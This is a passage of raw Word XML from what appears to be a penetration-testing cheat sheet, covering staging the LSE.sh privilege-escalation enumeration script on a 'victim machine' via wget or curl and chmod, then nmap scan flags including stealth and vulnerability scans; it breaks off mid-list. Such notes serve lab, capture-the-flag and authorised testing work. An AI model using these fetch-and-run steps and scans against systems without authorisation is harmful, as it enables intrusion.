          <w:p w14:paraId="48A34CC9" w14:textId="092FEE53" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03E5DA5D" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ONCE IN A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> LINUX</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SYSTEM, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>LSE.SH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> IS A SCRIPT WHICH CAN FIND PRIVILEGE ESCALATION VULNERABILITIES ON THE HOST MACHINE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757C5EF7" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:r w:rsidRPr="007F4AA8">
              <w:t>This will work on a Linux system</w:t>
            </w:r>
            <w:r>
              <w:t>, there are as of yet no versions for other types of OS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0228E810" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6"/>
          <w:p w14:paraId="3BC58F3D" w14:textId="11519760" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:r>
              <w:t xml:space="preserve">You can try to call this script from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>it’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> webpage directly use wget on the victim machine, or you can download and save the script as a file and upload it to the victim machine before running it that way.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F4AA8" w14:paraId="5814237A" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="72A6B5B7" w14:textId="6CAE82ED" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>26.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0096115D" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D948CD8" w14:textId="77777777" w:rsidR="007F4AA8" w:rsidRPr="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:r w:rsidRPr="007F4AA8">
              <w:t>The script can be downloaded and saved using wget:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7794F6" w14:textId="637D77A9" w:rsidR="007F4AA8" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F4AA8">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>wget "</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/diego-treitos/linux-smart-</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>enumeration/raw/master/lse.sh</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-O </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>lse.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F648980" w14:textId="75D27515" w:rsidR="006357DB" w:rsidRDefault="006357DB" w:rsidP="009A00A6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006357DB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>-OR USE CURL-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E2A3C3" w14:textId="16139F35" w:rsidR="006357DB" w:rsidRPr="006357DB" w:rsidRDefault="006357DB" w:rsidP="009A00A6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>curl</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/diego-treitos/linux-smart-</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
              <w:t>enumeration/raw/master/lse.sh</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>Lo</w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>lse.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC1CEBE" w14:textId="4D30C835" w:rsidR="006357DB" w:rsidRPr="006357DB" w:rsidRDefault="006357DB" w:rsidP="009A00A6">
            <w:r>
              <w:t>Don’t forget to change permissions so it can be executed:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1824D535" w14:textId="7F9A75F5" w:rsidR="007F4AA8" w:rsidRPr="00D2375C" w:rsidRDefault="007F4AA8" w:rsidP="009A00A6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F4AA8">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">700 </w:t>
            </w:r>
            <w:r w:rsidRPr="007F4AA8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>lse.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE4C27" w14:paraId="3194E49B" w14:textId="77777777" w:rsidTr="00BE4C27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0B74DE51" w14:textId="77777777" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27" w:rsidP="00FC5A3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1D81793C" w14:textId="77777777" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B14A1EE" w14:textId="77777777" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27" w:rsidP="00FC5A3D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C2FC780" w14:textId="77777777" w:rsidR="00BE4C27" w:rsidRDefault="00BE4C27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903D3EF" w14:textId="17D7425B" w:rsidR="00B17246" w:rsidRDefault="00BC7CB4" w:rsidP="00F93CE3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7CB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00617E43" w:rsidRPr="00617E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masscan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00EF1B7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Angry IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="698"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8026"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565208" w14:paraId="001A0103" w14:textId="77777777" w:rsidTr="00581287">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="40FA1F77" w14:textId="16D02312" w:rsidR="00565208" w:rsidRDefault="00500E0F" w:rsidP="002024A0">
            <w:r>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00565208">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5695E4A8" w14:textId="029299BD" w:rsidR="00565208" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidR="002024A0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="002024A0" w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(n</w:t>
            </w:r>
            <w:r w:rsidR="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ma</w:t>
            </w:r>
            <w:r w:rsidR="002024A0" w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>p is already installed on Kali Linux)</w:t>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Bold entries are slightly more important to use, or should be used first)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8026" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FE10828" w14:textId="77777777" w:rsidR="00565208" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:r>
              <w:t>Use nmap to scan the target host, checking which ports are open and which services may be running on those ports. Also, we can check the OS possibly.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA9D3AA" w14:textId="2114583F" w:rsidR="00565208" w:rsidRPr="00296B4C" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DE67A4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-vv -sV -sC -O </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-A</w:t>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:tab/>
              <w:t>enables OS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EF1B7E">
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="00A46FCA">
              <w:t>version detection, script scanning and traceroute</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-Pn</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t xml:space="preserve"> Treat all hosts as online -- skip host discovery</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script-updatedb</w:t>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
              <w:t>Update script database</w:t>
            </w:r>
            <w:r w:rsidR="00530AB8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> (use sudo)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DBF2EDA" w14:textId="5441B322" w:rsidR="00565208" w:rsidRPr="00A46FCA" w:rsidRDefault="00565208" w:rsidP="002024A0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script vuln</w:t>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00863C15">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">--top-ports </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD2239">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="004E53E1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004F59D9">
              <w:t>Scan # most common ports</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD2239">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-e </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD2239">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD2239">
              <w:t>Use specified interface</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00565208">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00565208">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--resolve-all</w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00565208">
              <w:t xml:space="preserve">If name resolves to more than 1 address, make nmap </w:t>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00296B4C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00565208">
              <w:t xml:space="preserve">scan all </w:t>
            </w:r>
            <w:r w:rsidR="00C92E4D" w:rsidRPr="00565208">
              <w:tab/>
              <w:t>addresses instead of only the first one.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t>TCP SY</w:t>
            </w:r>
            <w:r w:rsidR="007D0D4E">
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00EF4FEF">
              <w:t>/stealth</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t xml:space="preserve"> scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t>Connect</w:t>
            </w:r>
            <w:r w:rsidR="00EF4FEF">
              <w:t>/full open</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t xml:space="preserve"> scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t>ACK scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sW</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t>Window scan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:t>Maimon scan</w:t>
            </w:r>
            <w:r w:rsidRPr="007C3DD3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DC498D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-sU</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC498D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:t>UDP scan</w:t>
            </w:r>
            <w:r w:rsidR="00EF4FEF">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EF4FEF" w:rsidRPr="00EF4FEF">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF4FEF" w:rsidRPr="00EF4FEF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00EF4FEF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>sX</w:t>
            </w:r>
            <w:r w:rsidR="00EF4FEF" w:rsidRPr="00EF4FEF">
              <w:tab/>
              <w:t>Xmas scan</w:t>
            </w:r>
            <w:r w:rsidR="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00581287">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00581287" w:rsidRPr="00581287">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
